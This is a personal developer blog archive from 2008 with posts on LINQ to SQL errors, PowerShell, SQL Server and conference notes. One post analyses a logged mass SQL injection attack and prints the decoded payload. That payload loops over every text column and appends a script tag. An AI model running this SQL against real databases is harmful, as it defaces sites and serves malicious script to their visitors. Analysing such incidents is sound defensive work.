Sunday, June 29, 2008

LINQ to SQL architecture question

I have structured a project with a single LINQ to SQL .dbml file and a single DataAccess class that is used to call stored procs and query against this this DBML class. The DataAccess class implements the singleton pattern inasmuch as their's a static DataAccess property which is used for all DB access.

The business layer of the application creates an instance of the DataAccess object, calls the appropriate data access function and then returns.

When running as a web application it is being hit rapidly by 2 clients: (1) a browser calls to it about 1 to 50 times a second (writes data to DB) and (2) an excel spreadsheet calls the web app via a web service on an ad hoc basis and does a query for data.

When the spreadsheet does the query (the browser's hitting the site up to 50 times a second at the same time) I am getting several errors such as the following:

  •     Invalid attempt to call MetaData when reader is closed
  •     There is already an open DataReader associated with this Command which must be closed first.
  •     ExecuteNonQuery requires an open and available Connection. The connection's current state is closed.
  •     A transport-level error has occurred when receiving results from the server. (provider: Session Provider, error: 18 - Connection has been closed by peer)
  •     A severe error occurred on the current command.  The results, if any, should be discarded.
  •     A transport-level error has occurred when receiving results from the server. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.)

The first 2 errors were solved by adding MARS to the connection string: MultipleActiveResultSets=true

The rest of them I solved by adding a static lock object to the DataAccess class and wrapping all calls to the database in a lock(lockObj) {}.

This solution doesn't feel right though.

Comments on the general approach I've taken... Comments on the lock() solution...

Saturday, June 28, 2008

VS2008 bugs

Here are a few bugs that I've found so far with Visual Studio 2008:

  • If you have a lot of files open and you quickly hit Ctrl+F4 in succession then there's a good chance that you will crash VS2008. This sometimes happens when you click on the menus Window -> Close All Documents.
  • Sometimes I'm in a unit test and I quickly want to debug/run it so I hit Ctrl+R, Ctrl+T but it doesn't run. I then check the menu items at Test -> Debug -> Tests in Current Context and see that this item on the menu is disabled. I then have to fiddle about with the project jumping from file to file and keep on checking back and then it magically becomes enabled. I haven't worked out what the magic combination of moving around the project is that enables this yet...
  • When I set the browser to Firefox and debug a web app through Cassini then VS2008 doesn't terminate debugging when I exit Firefox. My options are then Shift+F5 to manually stop it or to right click on the Cassini icon in the Tray and select Stop.

21 July 2007: I think I've solved the second problem - where I can't debug a unit test sometimes. I think that this happens when the project's solution is read-only because it hasn't been checked out of source control.

Structuring a solution and project

How do you structure a new solution in Visual Studio?

Typically, within about 10 minutes of starting a new solution is VS2008, I will have 10 projects in that solutions. They are:

  1. The Application
  2. The Business Layer (BLL)
  3. The Database Layer (DB)
  4. The Logger
  5. The Utility Library

And then for each of those projects I have a unit test project. The new projects are the App, BLL, and DB. Items 4 and 5, the logger and utility library are used in all projects and when I find that a project needs a bit of functionality that's in another project I move it to the utility library so both solutions can share it.

Almost all of the code for any solution will go into the BLL. I try and put everything in there. The DB provides a facade to the data store and I try and keep the UI as thin as possible so that all the logic can be tested in the BLL. Whenever possible I'll use an interface and inject the dependent object into the relevant class so that I can mock the object during testing. For testing I use Visual Studios built in test harness and for mocking I use Rhino Mocks.

Friday, June 27, 2008

Powershell replace text in files and recurse subdirectories

I needed to go through every file in a folder and all of its sub directories and open each file and replace a given string. This is what I finally came up with. I'm sure that this can be improved on though...

function ReplaceText($fileInfo)
    if( $_.GetType().Name -ne 'FileInfo')
        # i.e. reject DirectoryInfo and other types
    $old = 'my old text'
    $new = 'my new text'
    (Get-Content $fileInfo.FullName) | % {$_ -replace $old, $new} | Set-Content -path $fileInfo.FullName
    "Processed: " + $fileInfo.FullName

$loc = 'c:\my file\location'
cd $loc
$files = Get-ChildItem . -recurse

$files | % { ReplaceText( $_ ) }

Invalid attempt to call MetaData when reader is closed

I'm using LINQ to SQL to write information at a rapid rate to the same table via calls to a web page. At the same time there is a web service providing results from that table. So far the best info I've found on this lies here:

  • Invalid attempt to call MetaData when reader is closed

However, this looks like it's going to be a hard problem to solve.

Need to try adding the following to my connection string declaration:


Subsequently hit this error as well:

  • There is already an open DataReader associated with this Command which must be closed first.

Reason given in this forum post was: This is due to a change in the default setting for MARs.  It used to be on by default and we changed it to off by default post RC1.  So just change your connection string to add it back (add MultipleActiveResultSets=True to connection string).

MARS stands for Multiple Active Result Sets.

Not sure what I'm doing with this data base at the moment, plenty of errors that need investigating:

  • ExecuteNonQuery requires an open and available Connection. The connection's current state is closed.
  • A transport-level error has occurred when receiving results from the server. (provider: Session Provider, error: 18 - Connection has been closed by peer)
  • A severe error occurred on the current command.  The results, if any, should be discarded.
  • A transport-level error has occurred when receiving results from the server. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.)

Sunday, June 22, 2008

Improving Hauppauge Wireless Performance

My Hauppauge MediaMVP has been pausing every few seconds when I've been using it over wireless, basically an apparent bandwidth problem. If I hard wire it to the network then it gets rid of the problem. Recently I needed to use it wirelessly again and so I had to solve the problem. I tried a few things but nothing worked until I changed the Wireless Channel from 6 to 11. As soon as that was done it started operating very smoothly and without the previous jerkiness.

This blog post serves 2 purposes: (1) To record and remind me how I fixed the problem and (2) to ask any reader if they know why changing the Wireless Channel from 6 to 11 would solve the problem?

Other settings that I have on my wireless access point are:

Wireless Network Type: 802.11g Only
No encryption

Saturday, June 21, 2008

Inktomi Slurp Confirm 404

Approximately once a month (or perhaps every 2 months) my web sites record a request for a page such as:


This is Yahoo checking to see that the web site correctly returns a 404 for pages that don't exist. To confirm that it really is Yahoo you should do a lookup on the IP where the request came from and check that it's INKTOMI CORPORATION.

I assume that this makes for better indexed web sites as the search engines can rely on your site to return the appropriate error codes for pages that have moved or are no longer there.

Here is some trivial information about the Inktomi bot's visit to the previously mentioned site. The first visit was recorded today (6/21/2008) at 6:31am ET and the last at 12:56pm. There were a total of 9 visits. The shortest time between visits was 9 minutes and the longest 79 minutes with an average of 48 minutes. Each IP address that each request came from was unique but they all fell in the 72.30.215.* block.

I've decided to try and table the visits to see exactly how often they check:


More visits:

2008-10-15T05:43:37Z /SlurpConfirm404/Honey.htm
2008-10-15T05:50:03Z /SlurpConfirm404/weather/heavenbecauseofyou/hearzg.htm
2008-10-15T05:52:43Z /SlurpConfirm404/fan/docs.htm
2008-10-15T05:58:59Z /SlurpConfirm404/dickg.htm
2008-10-15T06:30:23Z /SlurpConfirm404/thelmalouise/ALL-IMAGE-005-J/railways.htm
2008-10-15T06:43:15Z /SlurpConfirm404/pcwww.htm
2008-10-15T06:50:56Z /SlurpConfirm404/commandes.htm
2008-10-15T06:52:30Z /SlurpConfirm404/Patriotic/acarogicofla.htm
2008-10-15T06:59:11Z /SlurpConfirm404/adm_app/contact_me/ewebtur.htm
2008-10-15T07:03:34Z /SlurpConfirm404.htm
2008-10-15T07:04:00Z /SlurpConfirm404/narra/ArtEd/research_faculty.htm
2008-10-15T07:04:09Z /SlurpConfirm404/opinio/witzindex.htm
2008-10-15T07:28:16Z /SlurpConfirm404.htm
2008-10-15T07:30:11Z /SlurpConfirm404/wopabbswp/child-health/boys.htm
2008-10-15T07:42:09Z /SlurpConfirm404/wopsafiwp/wcwstinger/whoareyou.htm
2008-10-15T08:13:11Z /SlurpConfirm404/kurihara.htm
2008-10-15T10:40:58Z /SlurpConfirm404/diablo/WHW.htm
2008-10-16T06:30:39Z /SlurpConfirm404.htm
2008-10-16T07:56:24Z /SlurpConfirm404/MegRyan.htm
2008-10-16T08:48:33Z /SlurpConfirm404/handouts/loge/shackbar.htm
2008-10-16T09:01:04Z /SlurpConfirm404/aleapa_001.stats/manews.htm
2008-10-16T10:45:53Z  /SlurpConfirm404/minority.htm
2008-10-16T11:44:04Z  /SlurpConfirm404/BlushingAngel/ANIC/byblos.htm
2008-10-16T16:03:30Z  /SlurpConfirm404/cgiwrap/viten/INFO465-gs.htm
2008-10-16T17:30:22Z  /SlurpConfirm404/rant/business.demonizing_gat1a.htm
2008-10-16T18:36:13Z  /SlurpConfirm404/tma.htm
2008-10-17T02:19:56Z /SlurpConfirm404/drodgers/ppv.htm

SQL Injection Attack

I monitor the logs of a number of web sites and one of them has recently come under a SQL Injection Attack. Here is the code that was trying to be injected as a query param on a URL:

Exception in xxxxx.Page_Load() with param1=abc;DECLARE @S VARCHAR(4000);SET @S=CAST(
AS VARCHAR(4000));EXEC(@S);--:
String or binary data would be truncated.
The statement has been terminated.

With thanks to the guys on AZGroups I managed to learn a lot about this.

There's a great discussion thread about this here:

To decode the hex into the command that will be executed you can do that in SQL Server Management Studio by using the following syntax (kudos to slide_o_mix):


Put hex characters here with leading 0x

AS VARCHAR(4000));

When decoded, the SQL Injection Attack reads as follows:

a,syscolumns b WHERE AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['[email protected]+']
SET ['[email protected]+']=RTRIM(CONVERT(VARCHAR(4000),['[email protected]+']))+''<script src=></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Thanks to Scott Cate for further investigating this and decoding the riddle. Looks like the objective of this attack is to spam ads onto the target site.

Sunday, June 15, 2008

Finding non-unique rows in SQL Server

I was trying to copy a table of data from Microsoft Access into SQL Server. I setup the MS Access file as a Linked Server and then executed an:

insert into TableName (Col1, Col2, Col3, Col4)
select T.ColA as Col1, T.ColB as Col2, T.Col3, T.Col4,
from ACCESS_DB...TableName T

But I discovered that the unique key had not been set correct on the Access table so I had to find the duplicate keys. This is what did the trick:

select * from ACCESS_DB...TableName where Col1 in(
select Col1 from ACCESS_DB...TableName
group by Col1
having count(Col1) > 1)

This worked from SQL Server directly against the Access DB. The same type of syntax would work against any regular SQL Server table as well.

LINQ ToDictionary

If you want to convert an IEnumerable to a dictionary using LINQ then do:

Dictionary<string, object> dict = myList.ToDictionary(a => a.MyString, a => a.MyObject);

Saturday, June 14, 2008

Order of Usings in C#

Something strange with Visual Studio 2008. I was trying to use LINQ in a class in an Excel Addin that I was writing and setup the using statements as follows:

using System;
using System.Collections.Generic;
using System.Text;
using Excel = Microsoft.Office.Interop.Excel;
using System.Reflection;
using System.Linq;

Would not compile and no intellisense.

I re-arranged the usings like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Excel = Microsoft.Office.Interop.Excel;
using System.Reflection;

It compile and I received intellisense.

Out of curiosity I changed the usings back to how they originally were with the System.Linq at the end and this time VS2008 compiled it.

A bit weired - not sure what's happening here...

Cannot drop database because it is currently in use

I was getting this error when trying to drop a database:
Cannot drop database "MyDatabaseName" because it is currently in use.

I tried the sp_who command to see if there was anything holding on to the DB that I hadn't disconnected from. Couldn't see anything.

drop database MyDatabaseName kept on failing.

Eventually I closed SQL Server Management Studio (SSMS) and reopened it and the drop command then worked immediately. No idea why this happened but this was the solution.

Thursday, June 12, 2008


On one of my web sites I've noticed an attempt to access any one of the following 3 pages:




The pages are frequently followed by a long hash key sequence. Often the referring URL is a search from Google.

I've noticed this every now and then (about every two to six months) and Google has always been involved. A search of the web shows that others have seen this but with referring URL's being from Live search as well. Most commentators think that it's a random attack bot. I don't think that it follows that pattern but I'm not discounting this theory.

Today I came up with a new theory based on the pattern I saw. This was someone clicking on the AdSense link on one of the pages and reporting it to Google for "non compliance." So I was wondering if Google now has an automated way of telling web masters that someone has reported one of their pages for non-compliance. This would make sense so that web masters could check their pages to make sure that they are compliant with AdSense.

I haven't been able to find any further info on this theory yet though...

Saturday, June 7, 2008

Introduction to Powershell for Developers

From: Desert Code Camp 2007
Speaker: Anthony Park



{ - delineates a block of code.

$ - precedes a variable

-eq is 'equal'

-ne is 'not equal'

= is assignment

Store time intensive command results in a variable for later use.

e.g.: $b = Get-EventLog System

$_ is the self (this) variable.

Pipe variable or command results into the Get-Member command to see members of the object. eg: $b | Get-Member

To group a collection by one of the fields pipe the collection into the Group-Object and specify the member name as the following parameter. e.g. $b | Group-Object Source

You should sort the collection before grouping. e.g. $b | Sort-Object Source | Group-Object Source

You can filter a collection before (or after) applying the above command using the Where-Object. e.g. $b | Where-Object { $_.Source.StartsWith('S') } | Sort-Object Source | Group-Object Source

The $profile variable holds the default profile that gets run when you open Powershell. If you want to customize your Powershell then typing $profile in the Powershell environment will show you where your default profile is so that you can edit it.

 To retrieve a web page into a variable try: $mypage = (New-Object Net.WebClient).DownloadString('')



Friday, June 6, 2008

Web Application Hacking

From: Desert Code Camp
Speaker: Adam Monter


Don't keep the web server on the C: drive because a hacker can iterate backwards to the system files.

Validate all info coming in. (Prevents malicious scripts etc.) has a java proxy that shows what the application is doing. (I may have written down the url incorrectly or the site's changed since this talk as the web doesn't seem related to the subject so I'm not linking it from here.)

Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.

Wikipedia has a good page on SQL Injection.

OWASP (Open Web Application Security Project) is a free and open application security community.

 Visit Johnny I Hack Stuff - I was a bit skeptical about visiting a site with this name at first but it was given to me by the guy at the talk and so I trusted him and it turned out to have a page rank of 6.

Hackers can look at your cached page on Google without leaving an audit trail. (You can prevent Google from caching your pages with robots.txt and meta tag directives.)

SQL Server 2005 Do's and Don'ts for Developers

From:  Desert Code Camp 2007
Speaker: Eric Kassan (from World Doc)


Systems will scale better if less code is in the DB Server because almost always 1 Database Server but can have many application or web servers.

Specify dbo. in front of table name to improve performance.

Use a temp variable instead of a temp table if it's a relatively small data set.

Using Stored Procs for database access and never accessing tables gives you:

  • Enhanced security. Only need to grant access to user account to stored procedures and not to the tables.
  • Abstraction. You can change the database structure but the application talks to the the stored procs so will not be affected by the table structure changes.

Keep it simple - if there are a lot of users then don't use triggers, cursors and extended stored procs.

SEO for Coders

From: Desert Code Camp 2007
Speaker: Can't remember

Notes: is a good site for keywords

Google search: Using allintitle in Google search finds all pages with only those words in the title. Can also use double quotes in this section to find contiguous words.

Use mod rewrites to clean up URL's. Should have dashes to break up words in url. Don't use parameters on url. Look at and for good examples. Drupal automatically does the dashes for you if you're using it.

Validate site with XHTML. Validated sites rank higher.

Read Matt Cutts Blog.

Desert Code Camp 2007

I put my notes for Desert Code Camp 2008 on this site and have already found them useful. While doing a clear out today I found my hand written notes from the 15 September 2007 Desert Code Camp and decided to add them here as well for future reference.

Sessions attended, in order, from 9:15am to 6pm

Request object error

I came across an interesting problem today that I wanted to document in case I hit it again and provide some notes in the hope that this helps somebody else.

An ASP (not .net) forum that I'm responsible had the following error:

Request object error 'ASP 0104 :80004005'
Operation not Allowed
/forum/inc_UploadDefault.asp, line 4

The message wasn't that useful but I finally tracked down that it came from trying to upload a file to the ASP forum that was larger than 200 Kb.

It turns out that IIS 6.0 prevents the uploading of files larger than 200 Kb. This is not a big deal and I would expect there to be some sort of default limit.

What I did find unusual though were the steps that I had to go through to increase this limit.

  1. Stop "IIS Admin Service" - this also stopped "Word Wide Web Publishing Service", "FTP Publishing Service", and "HTTP SSL"
  2. Edit the C:\WINDOWS\system32\inetsrv\MetaBase.xml file and find the entry that read AspMaxRequestEntityAllowed="204800" and change this to read a larger value.
  3. Save the file.
  4. Restart the 4 services.

I would have expected to be able to change this entry through an interface but it appeared that I had to stop the sites to do this. If anybody knows a more elegant way to do this then please post a comment.

Monday, June 2, 2008

Integration Unit Testing Analogy

I like Roy Osherove's restaurant analogy of Unit Testing vs. Integration Testing:

When it comes to paying for a meal...

Integration testing is like giving one big check to the group, with everyone having to calculate on their own how much they need to pay. sometimes everyone things they are good, but in the end the total amount may be too high or too low. There is a lot of interaction going on to decide who pays for what and who has already paid.

Sunday, June 1, 2008

Intro to Dependency Injection and Inversion of Control

From: Desert Code Camp 2008
Speaker: Donn Felker (from Statera)


90% of injection is done in the constructor of the class by passing in instances as interfaces. The other 10% is done primarily through a setter property and in rare cases as a param to a method.

IoC = Dependency Inversion Principal. A service locater returns the concrete instances of classes requested. The service locater is a container.

Microsoft.Practices.Unity is a popular Microsoft container and Windsor Castle is the most popular open source container.

Links to containers:

Windsor Castle
Microsoft Unity
Structure Map

Search Engine Optimization

From: Desert Code Camp 2008
Speaker: Kay Frenzer (from Teralever)

4 factors when optimizing a web site:
Technical - i.e. do your pages show up / does the site work.
Content - The content on each page
Inbound Links - Links from sites with similar topics to your site.
Trust - Your site is a trusted site.
There's a robots meta tag that you can put on any page that will override what your robots.txt file states about the page: <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, none>
The <title> tag on the page is the most important part of the page when optimizing for keywords. Don't put your company name in the title (unless the name is part of the keyword(s) that you're optimizing for) but if you feel that you have to put the keywords first and the company name last. Don't use stop words in the title. Stops words are words such as: the, of, that, is, and, to, www, web, web page, homepage, home page. The maximum length for a title is 120 characters. Google displays 65 characters in its search.
Commercial tools for keyword optimization are and
LSI is Latent Semantic Indexing. The search/indexing bot looks at the words around the keywords to see if they are related. If not it will mark that section of text as spam and that page as a spam page.
Apparently your site can be penalized for being linked to from (1) link farms (2) porn sites (3) gambling sites (4) other non desirable or illegal sites. Personally I find this hard to believe as this would allow your competitors to displace you from good rankings by linking to you using these methods.
If you want to get a link count for your web site you should use Yahoo instead of Google because Google gives a deliberately misleading value. To get a link count of sites and pages that link to your site you should enter the following text into the Yahoo search box: link: -site:
Replace the guyellisrocks with your web site name.
When creating links on your site to other pages on your site use full URL's with the domain name as well and not relative paths.
Kay's presentation from today will be at
I would have liked to have seen the presenter walk through a real world case study and demonstrate a new site or page that she took on for a client and what she did at each step of the way and how she optimized each page and the final results over a period of (say) 6 to 12 months.

What's different about Ruby

From: Desert Code Camp 2008
Speaker: Logan Barrett


Ruby is a dynamic language.

IRB is a psuedo acronym that stands for Interactive Ruby.

Ruby has strong typing - you can't cast a string to an int.

Testing is emphasized in Ruby and built in.

Duck typing in Ruby replaces what an interface in C# would be used for.

Everything in Ruby is an object.

The method-missing method is a method that will catch any call to a method on an object that is missing. i.e. if a method hasn't been declared for an object then the method-missing method will be called.

A lambda function in Ruby is called a code block or just a block.

A block is typically used to iterate over a collection like a for or foreach loop in C#.

collection.each do |element| # iterates over all elements in the collection collection. do |number|
collection.each_with_index do |element,index|

Test Driven Development

From: Desert Code Camp 2008
Speaker: Saul Mora (from Go Daddy)


Read Pragmatic Unit Testing in C# with NUnit by Andy Hunt and David Thomas.

5 objectives in Test Driven Development:

Test what hasn't been tested.
Boundary Conditions
Inverse Relationships (objects that refer to each other)
Error conditions

Tools: For SQL Server - tsqlunit

The guys who created NUnit are apparently working on another project called Gallium (although I'm sure I've misspelled it because I can't find it in my searches) and they are also working for Microsoft. This note needs more info/editing.

Test Runners: and Resharper UnitRun are both unit test runners.

Another book: Test Driven Development by Kent Beck

References: Agile Data

Project patterns is to have a DLL (in a project) with the tests with references to the unit test DLL(s), mock DLL(s) and the tested project and all tests live here.

The [Setup]/[Teardown] attribute on functions in the unit test get done one for all the tests in that class. Can just as easily use the class' constructor and destructor/dispose methods to achieve the same.

Silverlight Zero to Hero

From: Desert Code Camp 2008
Speaker: Simon Allardice (from Interface Technical Training)

This is the first time that I've seen Simon speak and it was very good and very entertaining. He's Scottish with a good sense of humor and reminded me a bit of Billy Connolly. Very good at delivering his content at keeping the audience captive.

He made references to Florence Nightingale and Henri Matisse at the beginning of his talk which he said he was going to talk about and I thought that was a joke (I'm sure everyone else did as well) however he brought them back in later on and used them as analogies.


Silverlight 2.0 is almost chalk and cheese when compared to Silverlight 1.0.

Silverlight 2.0 is not just for media (video, audio, graphics) - although 1.0 was primarily that. Version 2.0 has C# and plenty of controls and is very powerful.

Use grids for tabular data (replaces <tables>) but if you can get your data over in another way (charts for example) use them.

Isolated storage can be expanded with the permission of the user so you're not stuck with the small initial limit if you need more local disk space.

Expression Blend is the tool of choice for designing and Visual Studio 2008 for programming.

Dan Wahlin has a blog based on Scott Guthrie's original posts about Silverlight.

Steve Krug's book Don't Make Me Think is a common sense approach to web usability.


ASP.NET AJAX Internals

From: Desert Code Camp 2008
Speaker: Rob Paveza (from Teralever)


Script# - This is a C# to Javascript compiler. Instead of generating IL code like the C# compiler normally would it generates javascript. I believe that it's written by Nikhil Kothari.

WebService calls can be made from the UpdatePanel which has the advantage of reducing the viewstate. These calls can be made static.

If using the Telerik controls then watch out for a conflict between them and ASP.NET Ajax as there are some incompatibilities.

Mootools and Prototype are Ajax toolkits. (I get the impression that Mootools is commercial and Prototype is free open source.)

To use a WebService call in Ajax you need to decorate the call with the [ScriptService] and [ScriptMethod] attributes.

If you put the ScriptManager reference (required for all ASP.NET Ajax pages) on a master page then you need to use a ScriptManagerProxy reference in the control that you're building. There are a number of arguments (attributes) that can be given to ScriptManager that I haven't used before that need further investigating.

The EnablePageMethods=true is a ScriptManager attribute that makes the page act like a web service.

Desert Code Camp 2008

This is the second year that I've been to Desert Code Camp. Lorin Thwaits is the camp director and always does an excellent job of organizing it. Last year there was a lack of food but that was rectified this year and there was good grub on hand.

The day is divided into eight 1-hour time slots with a ten minute break between each session starting at 9am. There were up to 7 talks being given in each of the time slots. I managed to make 6 of them and missed the last 2 for the day. Last year I made a ton of notes and I have not looked back on them for the last year and probably won't. To try and make my notes more useful to myself (and perhaps others) I'm going to put them here so that I can easily find them again. I only made notes about the stuff that I learned and even though some of the speakers may have said something important that one would normally note if I already knew it and am unlikely to forget it then I probably didn't not it down.

ASP.NET AJAX Internals
Silverlight Zero to Hero
Test Driven Development
What's different about Ruby?
Search Engine Optimization
Intro to Dependency Injection and Inversion of Control

A couple of speakers used the word grok to which I've heard recently at other meetings. This word I have no double will become more and more popular in use. Wikipedia defines it as: Grok means to understand so thoroughly that the observer becomes a part of the observed. First coined in Robert A. Heinlein's 1961 novel Stranger in a Strange Land.